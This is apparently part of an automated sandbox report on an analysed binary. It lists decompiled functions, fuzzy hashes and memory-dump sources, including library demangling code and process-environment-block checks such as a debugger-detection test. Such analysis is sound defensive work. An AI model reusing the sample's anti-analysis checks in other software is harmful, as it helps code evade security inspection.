                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1cacb5c68ebf6ad2d94d7031d4c640322d7c0a77eeece95c2bf94b85b6803995
                                                                                              • Instruction ID: efd4e37767f19d68d25ae621decb34d4ad8588e6e40ac51c1819ef48f7a62db5
                                                                                              • Opcode Fuzzy Hash: 1cacb5c68ebf6ad2d94d7031d4c640322d7c0a77eeece95c2bf94b85b6803995
                                                                                              • Instruction Fuzzy Hash: 38F09AB968024AEFD716CB2CCA6AB167BECE7057C8F108855E206DB79AC670DA418640
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01365F3F Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01365F3F(void* __ecx) {
				char _v8;
				intOrPtr _t9;
				intOrPtr _t17;
				char _t19;

				_t17 =  *0x13a100c;
				if(_t17 == 0) {
					_t19 = _t17 + 1;
					_v8 = _t19;
					_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t21 =  *((intOrPtr*)(_t9 + 8));
					if( *((intOrPtr*)(_t9 + 8)) < 0) {
						L3:
						_t17 = 2;
					} else {
						E01362CDB(_t21,  &_v8);
						if(_v8 == _t19) {
							goto L3;
						}
					}
					 *0x13a100c = _t17;
				}
				return _t17;
			}







                                                                                              0x01365f46
                                                                                              0x01365f4f
                                                                                              0x01365f57
                                                                                              0x01365f58
                                                                                              0x01365f5b
                                                                                              0x01365f5e
                                                                                              0x01365f62
                                                                                              0x01365f72
                                                                                              0x01365f74
                                                                                              0x01365f64
                                                                                              0x01365f68
                                                                                              0x01365f70
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01365f70
                                                                                              0x01365f7c
                                                                                              0x01365f7c
                                                                                              0x01365f82

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3431efb0d7f24a6cd44bdc97c5f863b950da4e5994746ff7e80ee6fee464d0d3
                                                                                              • Instruction ID: 1a3e84d67563f4203a7716f1ff1347878218ad9896ea3aa158914635fbb4ae5b
                                                                                              • Opcode Fuzzy Hash: 3431efb0d7f24a6cd44bdc97c5f863b950da4e5994746ff7e80ee6fee464d0d3
                                                                                              • Instruction Fuzzy Hash: AAF06531651224EBCF26CB4CD508A89B3BCEB44B99F1280A6F501DB255D7B4DD44C7D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01365EFB Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01365EFB(void* __ecx) {
				signed int _v8;
				intOrPtr _t10;
				signed int _t18;

				_t18 =  *0x13a1008;
				if(_t18 == 0) {
					_v8 = _v8 & _t18;
					_t18 = _t18 + 1;
					_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t21 =  *((intOrPtr*)(_t10 + 8));
					if( *((intOrPtr*)(_t10 + 8)) >= 0) {
						E01362C9B(_t21,  &_v8);
						if(_v8 == _t18) {
							_t18 = 2;
						}
					}
					 *0x13a1008 = _t18;
				}
				return _t18;
			}






                                                                                              0x01365f02
                                                                                              0x01365f0b
                                                                                              0x01365f13
                                                                                              0x01365f16
                                                                                              0x01365f17
                                                                                              0x01365f1a
                                                                                              0x01365f1e
                                                                                              0x01365f24
                                                                                              0x01365f2c
                                                                                              0x01365f30
                                                                                              0x01365f30
                                                                                              0x01365f2c
                                                                                              0x01365f38
                                                                                              0x01365f38
                                                                                              0x01365f3e

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9916fbe5131e032236fe1112bddff7615b096fa7e3b2960cdffb7157bf87f369
                                                                                              • Instruction ID: 200301bc9e0ef5c680e51fa9cf00233fd0905079fe81836f741766625137e2df
                                                                                              • Opcode Fuzzy Hash: 9916fbe5131e032236fe1112bddff7615b096fa7e3b2960cdffb7157bf87f369
                                                                                              • Instruction Fuzzy Hash: 3FF06D32A61274EFDF26CB4CC405E9AB3ACEB45BA9F5180A6F541EB245C6B0DE44C7C0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0095013E Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                              • Instruction ID: 7343d8c3a03ed812d8a56a605edf7932419f2f0479efafed147013da221c0c8e
                                                                                              • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                              • Instruction Fuzzy Hash: FDE09A35268548EFCB00CBA9CD81E25B3F8EB48320B140290FC25C73A0E638EE00DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136604D Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0136604D(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t16;

				_t10 =  *0x13a1008;
				if(_t10 == 0) {
					_v8 = _a4;
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t24 =  *((intOrPtr*)(_t13 + 8));
					if( *((intOrPtr*)(_t13 + 8)) >= 0) {
						E01362C9B(_t24,  &_v8);
					}
					_t16 = (0 | _v8 == 0x00000001) + 1;
					 *0x13a1008 = _t16;
					return _t16;
				}
				return _t10;
			}







                                                                                              0x01366053
                                                                                              0x0136605b
                                                                                              0x01366060
                                                                                              0x01366069
                                                                                              0x0136606c
                                                                                              0x01366070
                                                                                              0x01366076
                                                                                              0x01366076
                                                                                              0x01366089
                                                                                              0x0136608c
                                                                                              0x00000000
                                                                                              0x0136608c
                                                                                              0x0136608f

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df2b19537e1f7ab8ff96b5699b20a2f27a7e92fa0266f3ea1d92e945ddf674f3
                                                                                              • Instruction ID: 352ed35f198c387f9afec02129c650b23cb5a409da4c08e35fe8fe9aa179f270
                                                                                              • Opcode Fuzzy Hash: df2b19537e1f7ab8ff96b5699b20a2f27a7e92fa0266f3ea1d92e945ddf674f3
                                                                                              • Instruction Fuzzy Hash: A7E06535A00389EFCB16CF69C148A0AB7F8FB48389F6080A8E409C7644D334DE84CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136609F Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0136609F(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t16;

				_t10 =  *0x13a100c;
				if(_t10 == 0) {
					_v8 = _a4;
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t24 =  *((intOrPtr*)(_t13 + 8));
					if( *((intOrPtr*)(_t13 + 8)) >= 0) {
						E01362CDB(_t24,  &_v8);
					}
					_t16 = (0 | _v8 == 0x00000001) + 1;
					 *0x13a100c = _t16;
					return _t16;
				}
				return _t10;
			}







                                                                                              0x013660a5
                                                                                              0x013660ad
                                                                                              0x013660b2
                                                                                              0x013660bb
                                                                                              0x013660be
                                                                                              0x013660c2
                                                                                              0x013660c8
                                                                                              0x013660c8
                                                                                              0x013660db
                                                                                              0x013660de
                                                                                              0x00000000
                                                                                              0x013660de
                                                                                              0x013660e1

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f6f60f335221b83a14ac6f1650d8bdb6576aa879ef5297103514cc6a75074f24
                                                                                              • Instruction ID: b327fa2bb7d9b019633e555db6fd2fe19dcdd2e02ea9d1434ba27e981dcb5208
                                                                                              • Opcode Fuzzy Hash: f6f60f335221b83a14ac6f1650d8bdb6576aa879ef5297103514cc6a75074f24
                                                                                              • Instruction Fuzzy Hash: 23E06539604284EFCB06CF68C244A0AB7F8EB4838AF2180A8E40AC7254D734DE84CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00950109 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                              • Instruction ID: 4ad7a70cbd668adbed49015899539930eca2717fcddec6860ebbbcb2e942cbab
                                                                                              • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                              • Instruction Fuzzy Hash: 54E04632224A149BC761DB5AC940D96F7E8EBC8BB2B494826ED4997621C630FC05CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01365ECA Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01365ECA(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E01362C5B(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                                                              0x01365ed7
                                                                                              0x01365ed9
                                                                                              0x01365edc
                                                                                              0x01365edf
                                                                                              0x01365ee2
                                                                                              0x01365ef3
                                                                                              0x01365ef5
                                                                                              0x01365ee4
                                                                                              0x01365ee8
                                                                                              0x01365ef1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01365ef1
                                                                                              0x01365efa

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7711cd635c37d46dfb2f96c2ecc5650626d90e4a7ccd890cc5dfe5065b224619
                                                                                              • Instruction ID: 08b3138fa8538fb95435a336133fddd64e87a6d43b4eade18f09958c8a04733a
                                                                                              • Opcode Fuzzy Hash: 7711cd635c37d46dfb2f96c2ecc5650626d90e4a7ccd890cc5dfe5065b224619
                                                                                              • Instruction Fuzzy Hash: DFE08C32911228EBCF24DBCCC90498AFBECEB48B94B1180A6BA05E3104C670DE00C7D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01365FFE Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01365FFE(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t11;

				_v8 = _a4;
				_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t17 =  *((intOrPtr*)(_t11 + 8));
				if( *((intOrPtr*)(_t11 + 8)) >= 0) {
					E01362C5B(_t17,  &_v8);
				}
				return 0 | _v8 != 0x00000001;
			}





                                                                                              0x01366007
                                                                                              0x01366010
                                                                                              0x01366013
                                                                                              0x01366017
                                                                                              0x0136601d
                                                                                              0x0136601d
                                                                                              0x0136602c

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 079c823cf37c91148c7c0f463e5031a76f75c23312a02e8a9a2935f354f5f3e2
                                                                                              • Instruction ID: d7e33f059490eef7be502ef69e5551e797eba4a3703af4969f79f86a96ebb0ab
                                                                                              • Opcode Fuzzy Hash: 079c823cf37c91148c7c0f463e5031a76f75c23312a02e8a9a2935f354f5f3e2
                                                                                              • Instruction Fuzzy Hash: 7AE0E275515248EFCB04DBA8C549A4ABBFCEB48799F5188A4E40AD7254D234EE81DA04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013552B7 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E013552B7(void* __ecx, void* __eflags) {

				if(E01365ECA(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                                                              0x013552bf
                                                                                              0x013552d8
                                                                                              0x013552d3
                                                                                              0x013552d5
                                                                                              0x013552d5

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2a4b610b4c61d9fb9df73ca4cd0c5d292e289e55dbbc63600215bf54fef0ecb5
                                                                                              • Instruction ID: ba8c7c1ec64f450826d213a248012dc0a1736f90462599c32706da9eddb924e4
                                                                                              • Opcode Fuzzy Hash: 2a4b610b4c61d9fb9df73ca4cd0c5d292e289e55dbbc63600215bf54fef0ecb5
                                                                                              • Instruction Fuzzy Hash: A7C08C34040A4487CF2A89288370BE43358B3A6BCAFA0848CC9060B682D69EB883D700
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0095005F Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01360C1E Relevance: 30.3, APIs: 20, Instructions: 332COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 79%
                                                                                              			E01360C1E(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				void* _t98;
				intOrPtr* _t100;
				unsigned int _t104;
				void* _t108;
				void* _t122;
				unsigned int _t127;
				void* _t137;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t147;
				unsigned int _t149;
				signed char _t151;
				void* _t157;
				intOrPtr* _t158;
				void* _t160;
				signed int _t163;
				void* _t166;
				signed int* _t168;
				signed int _t175;
				intOrPtr _t179;
				void* _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t189;
				unsigned int _t200;
				signed int _t228;
				void* _t247;
				signed int _t251;
				intOrPtr* _t254;
				intOrPtr* _t255;
				void* _t256;
				void* _t257;

				_t247 = __edx;
				_t192 =  *0x13a0b18; // 0x0
				_t257 = _t256 - 0x30;
				_t98 =  *_t192;
				if(_t98 == 0) {
					L51:
					E0135BE7A(_t192, _a4, 1, _a8);
					L52:
					_t100 = _a4;
					L53:
					return _t100;
				}
				if(_t98 < 0x36 || _t98 > 0x39) {
					if(_t98 != 0x5f) {
						goto L50;
					}
					goto L4;
				} else {
					L4:
					_t189 = _t98 - 0x36;
					_t192 = _t192 + 1;
					 *0x13a0b18 = _t192;
					if(_t189 != 0x29) {
						__eflags = _t189;
						if(_t189 < 0) {
							L50:
							_push(2);
							L49:
							E0135B826(_a4);
							goto L52;
						}
						__eflags = _t189 - 3;
						if(__eflags > 0) {
							goto L50;
						}
						L11:
						if(_t189 == 0xffffffff) {
							goto L50;
						}
						_t254 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t254;
						_v8 =  *((intOrPtr*)(_t254 + 4));
						_t251 = _t189 & 0x00000002;
						if(_t251 == 0) {
							L23:
							if((_t189 & 0x00000004) != 0) {
								_t149 =  *0x13a0b20; // 0x0
								_t151 =  !(_t149 >> 1);
								_t276 = _t151 & 0x00000001;
								_push( &_v52);
								if((_t151 & 0x00000001) == 0) {
									E0135BD7B( &_v12, E0135F18F(_t247, __eflags));
								} else {
									_t157 = E0135BE4F(_t192,  &_v44, 0x20, E0135F18F(_t247, _t276));
									_t257 = _t257 + 0x10;
									_t158 = E0135BB4B(_t157,  &_v28,  &_v12);
									_v12 =  *_t158;
									_v8 =  *((intOrPtr*)(_t158 + 4));
								}
							}
							_t104 =  *0x13a0b20; // 0x0
							_push( &_v52);
							if(( !(_t104 >> 1) & 0x00000001) == 0) {
								_t108 = E0135F36A();
								_t195 =  &_v12;
								E0135BD7B( &_v12, _t108);
							} else {
								_t147 = E0135BB4B(E0135F36A(),  &_v44,  &_v12);
								_t195 =  *_t147;
								_v12 =  *_t147;
								_v8 =  *((intOrPtr*)(_t147 + 4));
							}
							if( *_t254 != 0) {
								_t143 = E0135BE4F(_t195,  &_v52, 0x28,  &_v12);
								_t257 = _t257 + 0xc;
								_t144 = E0135BB6D(_t143,  &_v44, 0x29);
								_v12 =  *_t144;
								_v8 =  *((intOrPtr*)(_t144 + 4));
							}
							_t255 = E0135B660(0x13a0b34, 8);
							if(_t255 == 0) {
								_t255 = 0;
							} else {
								 *_t255 = 0;
								 *((intOrPtr*)(_t255 + 4)) = 0;
							}
							E0135F43F( &_v36, _t255);
							E0135BD24( &_v12, E0135BB6D(E0135BE4F(0x13a0b34,  &_v44, 0x28, E01360FC8( &_v52)),  &_v28, 0x29));
							_t200 =  *0x13a0b20; // 0x0
							if((_t200 & 0x00000060) != 0x60 && _t251 != 0) {
								E0135BD24( &_v12,  &_v20);
								_t200 =  *0x13a0b20; // 0x0
							}
							_push( &_v52);
							if(( !(_t200 >> 0x13) & 0x00000001) == 0) {
								_t122 = E013612B1();
								_t204 =  &_v12;
								E0135BD7B( &_v12, _t122);
							} else {
								_t137 = E013612B1();
								_t204 =  &_v12;
								E0135BD24( &_v12, _t137);
							}
							E0135BD24( &_v12, E0136125D(_t204,  &_v52));
							_t127 =  *0x13a0b20; // 0x0
							_push( &_v52);
							if(( !(_t127 >> 8) & 0x00000001) == 0) {
								E0135BD7B( &_v12, E0136123A());
							} else {
								E0135BD24( &_v12, E0136123A());
							}
							if(_t255 == 0) {
								_push(3);
								goto L49;
							} else {
								 *_t255 = _v12;
								 *((intOrPtr*)(_t255 + 4)) = _v8;
								_t100 = _a4;
								 *_t100 = _v36;
								 *((intOrPtr*)(_t100 + 4)) = _v32;
								goto L53;
							}
						}
						if( *_t192 == 0x40) {
							_t228 = _t192 + 1;
							__eflags = _t228;
							 *0x13a0b18 = _t228;
						} else {
							_v28 = "::";
							_v24 = 2;
							_t238 = E0135B77F( &_v44,  &_v28);
							E0135BB4B(_t171,  &_v28,  &_v12);
							_v12 = _v28;
							_v8 = _v24;
							_t175 =  *0x13a0b18; // 0x0
							if( *_t175 == 0) {
								E0135BB4B(E0135B826( &_v52, 1),  &_v28,  &_v12);
								_v12 = _v28;
								_t179 = _v24;
							} else {
								_t183 = E0135BE4F(_t238,  &_v28, 0x20, E0135CD2F(_t247,  &_v44));
								_t257 = _t257 + 0x10;
								_t184 = E0135BB4B(_t183,  &_v52,  &_v12);
								_t179 =  *((intOrPtr*)(_t184 + 4));
								_v12 =  *_t184;
							}
							_t228 =  *0x13a0b18; // 0x0
							_v8 = _t179;
						}
						_t160 =  *_t228;
						if(_t160 == 0) {
							E0135BB4B(E0135B826( &_v52, 1), _a4,  &_v12);
							goto L52;
						} else {
							if(_t160 != 0x40) {
								goto L50;
							}
							_t163 =  *0x13a0b20; // 0x0
							 *0x13a0b18 = _t228 + 1;
							_push( &_v52);
							if((_t163 & 0x00000060) == 0x60) {
								_t166 = E0136146B();
								_t192 =  &_v20;
								E0135BD7B( &_v20, _t166);
							} else {
								_t168 = E0136146B();
								_t192 =  *_t168;
								_v20 =  *_t168;
								_v16 = _t168[1];
							}
							goto L23;
						}
					}
					_t185 =  *_t192;
					if(_t185 == 0) {
						goto L51;
					} else {
						_t189 = _t185 - 0x3d;
						_t192 = _t192 + 1;
						 *0x13a0b18 = _t192;
						if(_t189 < 4 || _t189 > 7) {
							_t189 = _t189 | 0xffffffff;
						}
						goto L11;
					}
				}
			}













































                                                                                              0x01360c1e
                                                                                              0x01360c21
                                                                                              0x01360c27
                                                                                              0x01360c2a
                                                                                              0x01360c31
                                                                                              0x01360fb0
                                                                                              0x01360fb8
                                                                                              0x01360fc0
                                                                                              0x01360fc0
                                                                                              0x01360fc3
                                                                                              0x01360fc7
                                                                                              0x01360fc7
                                                                                              0x01360c39
                                                                                              0x01360c41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360c47
                                                                                              0x01360c47
                                                                                              0x01360c4a
                                                                                              0x01360c4d
                                                                                              0x01360c4e
                                                                                              0x01360c57
                                                                                              0x01360c7f
                                                                                              0x01360c81
                                                                                              0x01360fac
                                                                                              0x01360fac
                                                                                              0x01360fa2
                                                                                              0x01360fa5
                                                                                              0x00000000
                                                                                              0x01360fa5
                                                                                              0x01360c87
                                                                                              0x01360c8a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360c90
                                                                                              0x01360c93
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360c99
                                                                                              0x01360c9e
                                                                                              0x01360ca2
                                                                                              0x01360ca8
                                                                                              0x01360cae
                                                                                              0x01360cb1
                                                                                              0x01360cb4
                                                                                              0x01360da1
                                                                                              0x01360da4
                                                                                              0x01360da6
                                                                                              0x01360dad
                                                                                              0x01360daf
                                                                                              0x01360db4
                                                                                              0x01360db5
                                                                                              0x01360e1f
                                                                                              0x01360db7
                                                                                              0x01360dc3
                                                                                              0x01360dc8
                                                                                              0x01360dd5
                                                                                              0x01360ddf
                                                                                              0x01360de2
                                                                                              0x01360de2
                                                                                              0x01360db5
                                                                                              0x01360e24
                                                                                              0x01360e32
                                                                                              0x01360e33
                                                                                              0x01360e57
                                                                                              0x01360e5e
                                                                                              0x01360e61
                                                                                              0x01360e35
                                                                                              0x01360e45
                                                                                              0x01360e4a
                                                                                              0x01360e4f
                                                                                              0x01360e52
                                                                                              0x01360e52
                                                                                              0x01360e6a
                                                                                              0x01360e76
                                                                                              0x01360e7b
                                                                                              0x01360e86
                                                                                              0x01360e90
                                                                                              0x01360e93
                                                                                              0x01360e93
                                                                                              0x01360ea2
                                                                                              0x01360ea6
                                                                                              0x01360eaf
                                                                                              0x01360ea8
                                                                                              0x01360ea8
                                                                                              0x01360eaa
                                                                                              0x01360eaa
                                                                                              0x01360eb6
